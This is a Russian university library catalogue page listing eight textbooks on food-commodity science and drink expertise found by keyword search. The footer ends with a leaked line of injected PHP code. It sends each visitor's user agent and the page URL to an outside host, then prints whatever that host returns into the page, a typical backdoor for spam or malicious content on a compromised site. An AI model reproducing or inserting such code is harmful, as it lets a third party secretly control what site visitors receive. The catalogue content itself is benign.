Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

55 пользователей


Зарегистрированных: 1 

Сафарова Лилия Раильевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=НАПИТОК БЕЗАЛКОГОЛЬНЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Шепелев А. Ф. Товароведение и экспертиза вкусовых и алкогольных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, К. Р. Мхитарян. - 205 с.
2. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
3. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

4. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
5. 
Митвайс, Ирина Ивановна. Товароведение вкусовых товаров [Текст] : Уч.пособие / И. И. Митвайс, 2002. - 480 с.
6. 
Чепурной, Иван Петрович. Товароведение и экспертиза вкусовых товаров [Текст] : Учеб. для вузов по специальности "Товароведение и экспертиза товаров" / И. П. Чепурной, 2002. - 402, [1] с.

Вкусовые товары включают очень разнообразные по составу и свойствам <продовольственные> товары: <чай> и <кофе>, <пряности> и <приправы>, <безалкогольные> и <алкогольные> <напитки>. В данной книге представлены достаточно полные сведения о классификации этих групп товаров, приводятся факторы, формирующие и сохраняющие их <качество>.

Впервые приводятся методологические подходы к проведению экспертизы этой группы товаров с использованием как современных методов анализа, так и оригинальных экспресс-методов.

7. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
8. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3221 - 04.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.80 с.12 запросов, 0.48c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;